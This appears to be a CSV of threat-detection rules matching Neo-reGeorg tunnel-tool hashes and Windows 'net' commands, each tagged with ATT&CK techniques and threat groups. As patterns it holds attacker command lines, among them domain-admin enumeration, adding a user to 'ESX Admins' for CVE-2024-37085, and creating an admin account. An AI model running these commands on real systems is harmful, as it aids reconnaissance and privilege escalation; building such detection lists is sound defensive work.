"*ab7eed3ed5928eb01b0676183186172a6a23711c645ba6f97081efaf3b0d2fec*",".{0,1000}ab7eed3ed5928eb01b0676183186172a6a23711c645ba6f97081efaf3b0d2fec.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*b0c4f83b23c0bd366537a33642050c0ddfb4184d969dbf2e934903873a801953*",".{0,1000}b0c4f83b23c0bd366537a33642050c0ddfb4184d969dbf2e934903873a801953.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*b2b717b196a443ae5421b0e6cb1656d29034ede9c604bf04fec2bddaeba5dcf8*",".{0,1000}b2b717b196a443ae5421b0e6cb1656d29034ede9c604bf04fec2bddaeba5dcf8.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*baf1e7bdd6feedd6b9144fed16093bd281ce26dc0da57137a5385fc7a5fc498f*",".{0,1000}baf1e7bdd6feedd6b9144fed16093bd281ce26dc0da57137a5385fc7a5fc498f.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*c09e5a6ac3d8fb135b20e08d1550b54ea0ea84da2bcdaf2dbfa739f607804b88*",".{0,1000}c09e5a6ac3d8fb135b20e08d1550b54ea0ea84da2bcdaf2dbfa739f607804b88.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*c4183ce1d991cb27ef71b811f373222759494d1cf1db55dccce83405d0d570d3*",".{0,1000}c4183ce1d991cb27ef71b811f373222759494d1cf1db55dccce83405d0d570d3.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*c938afbd5c475a7071dbc1912a4b5c211f7c8bbbae1c2389989c2115a08d7a0d*",".{0,1000}c938afbd5c475a7071dbc1912a4b5c211f7c8bbbae1c2389989c2115a08d7a0d.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*cacc832d9daf18d621c26497f5affd8b6b27cf5e34332b8bd95da127efdbb5e1*",".{0,1000}cacc832d9daf18d621c26497f5affd8b6b27cf5e34332b8bd95da127efdbb5e1.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*cb183ce9401cd7ad838bedb22fb49717d5de7da10b8f64781aceb4912d6f5ec8*",".{0,1000}cb183ce9401cd7ad838bedb22fb49717d5de7da10b8f64781aceb4912d6f5ec8.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*cc1a1ea3b0a719e36037ca340e24d6d574324578267bdfc38c3b4710289ec578*",".{0,1000}cc1a1ea3b0a719e36037ca340e24d6d574324578267bdfc38c3b4710289ec578.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*cc284e9b0925fd814e4aa3d125804f7cde054863c3c467492a14e8f73a4cbced*",".{0,1000}cc284e9b0925fd814e4aa3d125804f7cde054863c3c467492a14e8f73a4cbced.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*cd152f7de2ba0b3fc2e6053141b7bf326bca81aed5d5efa709bb10baa801cdd2*",".{0,1000}cd152f7de2ba0b3fc2e6053141b7bf326bca81aed5d5efa709bb10baa801cdd2.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*cm9vdDppcyB0d2VsdmU=*",".{0,1000}cm9vdDppcyB0d2VsdmU\=.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*d77577b4a183167f9e8b5f798e3f71fa4f41c81d1db9ce37c68bb6decfbdf737*",".{0,1000}d77577b4a183167f9e8b5f798e3f71fa4f41c81d1db9ce37c68bb6decfbdf737.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*d80046ee572c3222790560fc51c02de131507d5425bed6cecca98bc3f3ca50e9*",".{0,1000}d80046ee572c3222790560fc51c02de131507d5425bed6cecca98bc3f3ca50e9.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*dc57b353d32389a0af8a7ccb2054633ac502d899bb5bc9e656e91849215a57a1*",".{0,1000}dc57b353d32389a0af8a7ccb2054633ac502d899bb5bc9e656e91849215a57a1.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*debbc69c2926f0062b8243a484cd5710c6ba290f738e26a6e6ff403c3a536843*",".{0,1000}debbc69c2926f0062b8243a484cd5710c6ba290f738e26a6e6ff403c3a536843.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*e10eff3227d730806c99dc8ac0f38a2262ed5ab3a86d90b4acb7efbb2d6d2def*",".{0,1000}e10eff3227d730806c99dc8ac0f38a2262ed5ab3a86d90b4acb7efbb2d6d2def.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*e7836e1d44fe8ea29276fba8ea5fd5c94a242c2ec8d04850a62625c7792bff46*",".{0,1000}e7836e1d44fe8ea29276fba8ea5fd5c94a242c2ec8d04850a62625c7792bff46.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*e9894baec4b491e0ee3bce3a760b33546ee03270f9ea6155f5dbebd66d820c11*",".{0,1000}e9894baec4b491e0ee3bce3a760b33546ee03270f9ea6155f5dbebd66d820c11.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*f7b6475de06cdecd9b187a735bb3f960fa56bc12c7205225e0550dd7a7814a34*",".{0,1000}f7b6475de06cdecd9b187a735bb3f960fa56bc12c7205225e0550dd7a7814a34.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*f7c1d9613d4f4a7d5cc193f7a52c83aa3be1abf466de9ef0a9e2b2faaa846a69*",".{0,1000}f7c1d9613d4f4a7d5cc193f7a52c83aa3be1abf466de9ef0a9e2b2faaa846a69.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*fa2f44b31d65e2b907ad9a3e1ddf95d9aac53905b53ff2bfeb178a7746b0cafe*",".{0,1000}fa2f44b31d65e2b907ad9a3e1ddf95d9aac53905b53ff2bfeb178a7746b0cafe.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*fdaaa6bd9cbb9875b35f339dbd7b7481bc3aef2e2eb59caa2b77ffbd34ed079b*",".{0,1000}fdaaa6bd9cbb9875b35f339dbd7b7481bc3aef2e2eb59caa2b77ffbd34ed079b.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*L-codes/Neo-reGeorg*",".{0,1000}L\-codes\/Neo\-reGeorg.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","1","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*NeoGeorg says, 'All seems fine'*",".{0,1000}NeoGeorg\ssays,\s\'All\sseems\sfine\'.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*neoreg.py generate*",".{0,1000}neoreg\.py\sgenerate.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*neoreg.py -k * -u http*.php*",".{0,1000}neoreg\.py\s\-k\s.{0,1000}\s\-u\shttp.{0,1000}\.php.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*\net.exe"" accounts*",".{0,1000}\\net\.exe\""\saccounts.{0,1000}","greyware_tool_keyword","net","Enumerate local accounts","T1087.001 - T1003","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*\net.exe* localgroup admin*",".{0,1000}\\net\.exe.{0,1000}\slocalgroup\sadmin.{0,1000}","greyware_tool_keyword","net","showing users in a privileged group. ","T1069 - T1003","TA0007 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*\net.exe* sessions*",".{0,1000}\\net\.exe.{0,1000}\ssessions.{0,1000}","greyware_tool_keyword","net","List active SMB session","T1135 - T1047","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*\net.exe* view */domain*",".{0,1000}\\net\.exe.{0,1000}\sview\s.{0,1000}\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
"*\net1 sessions*",".{0,1000}\\net1\ssessions.{0,1000}","greyware_tool_keyword","net","List active SMB session","T1135 - T1047","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*net  group ""domain admins"" /domain*",".{0,1000}net\s\sgroup\s\""domain\sadmins\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net  group ""Domain Computers"" /domain*",".{0,1000}net\s\sgroup\s\""Domain\sComputers\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net  group ""domain computers"" /domain*",".{0,1000}net\s\sgroup\s\""domain\scomputers\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net  group ""enterprise admins"" /domain*",".{0,1000}net\s\sgroup\s\""enterprise\sadmins\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net  group ""ESX Admins"" /domain /add*",".{0,1000}net\s\sgroup\s\""ESX\sAdmins\""\s\/domain\s\/add.{0,1000}","greyware_tool_keyword","net","potential CVE-2024-37085 exploitation","T1098","TA0003 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Privilege Escalation","https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net  group ""ESX Admins""*",".{0,1000}net\s\sgroup\s\""ESX\sAdmins\"".{0,1000}","greyware_tool_keyword","net","potential CVE-2024-37085 exploitation","T1098","TA0003 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Privilege Escalation","https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net  user admin P@ssw0rd!*",".{0,1000}net\s\suser\sadmin\sP\@ssw0rd!.{0,1000}","greyware_tool_keyword","net","potential CVE-2024-37085 exploitation","T1098","TA0003 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Privilege Escalation","https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net .exe* group ""ESX Admins""*",".{0,1000}net\s\.exe.{0,1000}\sgroup\s\""ESX\sAdmins\"".{0,1000}","greyware_tool_keyword","net","potential CVE-2024-37085 exploitation","T1098","TA0003 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Privilege Escalation","https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net group ""Domain Admins"" /domain*",".{0,1000}net\sgroup\s\""Domain\sAdmins\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net group ""domain computers"" /domain*",".{0,1000}net\sgroup\s\""domain\scomputers\""\s\/domain.{0,1000}","greyware_tool_keyword","net","List PCs connected to the domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt/blob/alperen_ugurlu_hack/AD_Enumeration_Hunt.ps1","1","0","N/A","N/A","6","1","92","20","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z"
"*net group *Account Operators* /domain*",".{0,1000}net\sgroup\s.{0,1000}Account\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
"*net group *Backup Operators* /domain*",".{0,1000}net\sgroup\s.{0,1000}Backup\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
"*net group *Domain Computers* /domain*",".{0,1000}net\sgroup\s.{0,1000}Domain\sComputers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
"*net group *Domain Controllers* /domain*",".{0,1000}net\sgroup\s.{0,1000}Domain\sControllers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
